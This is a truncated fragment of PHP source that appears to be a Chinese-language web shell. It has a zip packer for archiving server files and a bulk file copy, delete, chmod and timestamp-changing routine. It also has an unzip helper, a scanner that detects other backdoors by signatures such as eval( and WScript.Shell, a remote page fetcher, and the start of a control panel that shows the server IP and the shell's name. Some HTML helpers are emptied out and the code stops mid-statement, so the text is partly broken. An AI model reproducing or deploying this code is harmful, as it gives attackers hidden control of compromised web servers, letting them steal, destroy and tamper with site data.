var $dirstr='';
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function startfile($path = 'QQqun555227.zip'){
$this->gzfilename=$path;
$mypathdir=array();
do{
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
do{
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,"w")){
return true;
}
return false;
}
function addfile($data, $name){
$name = str_replace('\\', '/', $name);
if(strrchr($name,'/')=='/') return $this->adddir($name);
$dtime = dechex($this->unix2DosTime());
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$datastr = "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $hexdtime;
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
$datastr .= pack('v', strlen($name));
$datastr .= pack('v', 0);
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $hexdtime;
$dirstr .= pack('V', $crc);
$dirstr .= pack('V', $c_len);
$dirstr .= pack('V', $unc_len); // uncompressed filesize
$dirstr .= pack('v', strlen($name) ); // length of filename
$dirstr .= pack('v', 0 ); // extra field length
$dirstr .= pack('v', 0 ); // file comment length
$dirstr .= pack('v', 0 ); // disk number start
$dirstr .= pack('v', 0 ); // internal file attributes
$dirstr .= pack('V', 32 ); // external file attributes - 'archive' bit set
$dirstr .= pack('V',$this->datastr_len ); // relative offset of local header
$dirstr .= $name;
$this->dirstr .= $dirstr; //目录信息
$this -> file_count ++;
$this -> dirstr_len += strlen($dirstr);
$this -> datastr_len += $my_datastr_len;
}
function adddir($name){
$name = str_replace("\\", "/", $name);
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
fwrite($this->fp,$datastr); //写入新的文件内容
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;
$this->dirstr .= $dirstr; //目录信息
$this -> file_count ++;
$this -> dirstr_len += strlen($dirstr);
$this -> datastr_len += $my_datastr_len;
}
function createfile(){
//压缩包结束信息,包括文件总数,目录信息读取指针位置等信息
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
pack('v', $this -> file_count) .
pack('v', $this -> file_count) .
pack('V', $this -> dirstr_len) .
pack('V', $this -> datastr_len) .
"\x00\x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
function File_Act($array,$actall,$inver,$REAL_DIR)
{
if(($count = count($array)) == 0) return '请选择文件';
if($actall == 'e')
{
function listfiles($dir=".",$faisunZIP,$mydir){
$sub_file_num = 0;
if(is_file($mydir."$dir")){
if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
$faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
return 1;
}
return 0;
}
$handle=opendir($mydir."$dir");
while ($file = readdir($handle)) {
if($file=="."||$file=="..")continue;
if(is_dir($mydir."$dir/$file")){
$sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
}
else {
if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
$faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
$sub_file_num ++;
}
}
}
closedir($handle);
if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
return $sub_file_num;
}
function num_bitunit($num){
$bitunit=array(' B',' KB',' MB',' GB');
for($key=0;$key=pow(2,10*$key)-1){ //1023B 会显示为 1KB
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
}
}
return $num_bitunit_str;
}
$mydir=$REAL_DIR.'/';
if(is_array($array)){
$faisunZIP = new PHPzip;
if($faisunZIP -> startfile("$inver")){
$filenum = 0;
foreach($array as $file){
$filenum += listfiles($file,$faisunZIP,$mydir);
}
$faisunZIP -> createfile();
return "压缩完成,共添加 $filenum 个文件.
点击下载 $inver (".num_bitunit(filesize("$inver")).")";
}else{
return "$inver 不能写入,请检查路径或权限是否正确.
";
}
}else{
return "没有选择的文件或目录.
";
}
}
$i = 0;
while($i < $count)
{
$array[$i] = urldecode($array[$i]);
switch($actall)
{
case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;
case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;
case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;
case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;
}
$i++;
}
return '所选文件'.$msg.'完毕';
}
function start_unzip($tmp_name,$new_name,$todir='zipfile'){
$z = new Zip;
$have_zip_file=0;
$upfile = array("tmp_name"=>$tmp_name,"name"=>$new_name);
if(is_file($upfile[tmp_name])){
$have_zip_file = 1;
echo "
正在解压: $upfile[name]
";
if(preg_match('/\.zip$/mis',$upfile[name])){
$result=$z->Extract($upfile[tmp_name],$todir);
if($result==-1){
echo "
文件 $upfile[name] 错误.
";
}
echo "
完成,共建立 $z->total_folders 个目录,$z->total_files 个文件.
";
}else{
echo "
$upfile[name] 不是 zip 文件.
";
}
if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
@unlink($upfile[name]);
rename($upfile[tmp_name],$upfile[name]);
}
}
}
function muma($filecode,$filetype){
$dim = array(
"php" => array("eval(","exec("),
"asp" => array("WScript.Shell","execute(","createtextfile("),
"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
"jsp" => array("runtime.exec(")
);
foreach($dim[$filetype] as $code){
if(stristr($filecode,$code)) return true;
}
}
function debug($file,$ftype){
$type=explode('|',$ftype);
foreach($type as $i){
if(stristr($file,$i)) return true;
}
}
/*---string---*/
function str_path($path){
return str_replace('//','/',$path);
}
function msg($msg){
die("");
}
function uppath($nowpath){
$nowpath = str_replace('\\','/',dirname($nowpath));
return urlencode($nowpath);
}
function xxstr($key){
$temp = str_replace("\\\\","\\",$key);
$temp = str_replace("\\","\\\\",$temp);
return $temp;
}
/*---html---*/
function html_ta($url,$name){
html_n("$name");
}
function html_a($url,$name,$where=''){
html_n("$name ");
}
function html_img($url){
html_n("![](\"?img=$url\") ");
}
function back(){
html_n("");
}
function html_radio($namei,$namet,$v1,$v2){
html_n(''.$namei);
html_n(''.$namet.'
');
}
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
if($mode){
html_n("$text");
}else{
html_n("$text ");
}
}
function html_text($name,$cols,$rows,$value = ''){
html_n("
");
}
function html_select($array,$mode = '',$change = '',$name = 'class'){
html_n("");
}
function html_font($color,$size,$name){
html_n("$name");
}
function GetHtml($url)
{
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
if(function_exists('fsockopen')){
$link = parse_url($url);
$query=$link['path'].'?'.$link['query'];
$host=strtolower($link['host']);
$port=$link['port'];
if($port==""){$port=80;}
$fp = fsockopen ($host,$port, $errno, $errstr, 10);
if ($fp)
{
$out = "GET /{$query} HTTP/1.0\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$inheader=1;
while(!feof($fp))
{$line=fgets($fp,4096);
if($inheader==0){$contents.=$line;}
if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
}
fclose ($fp);
$c= $contents;
}
}
if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if(empty($c) && ini_get('allow_url_fopen')){
$c = file_get_contents($url);
}
if(empty($c)){
echo "document.write('');";
}
if(!empty($c))
{
return $c;
}
}
function html_main($path,$shellname){
$serverip=gethostbyname($_SERVER['SERVER_NAME']);
print<< {$shellname}
END;
html_n(" | | |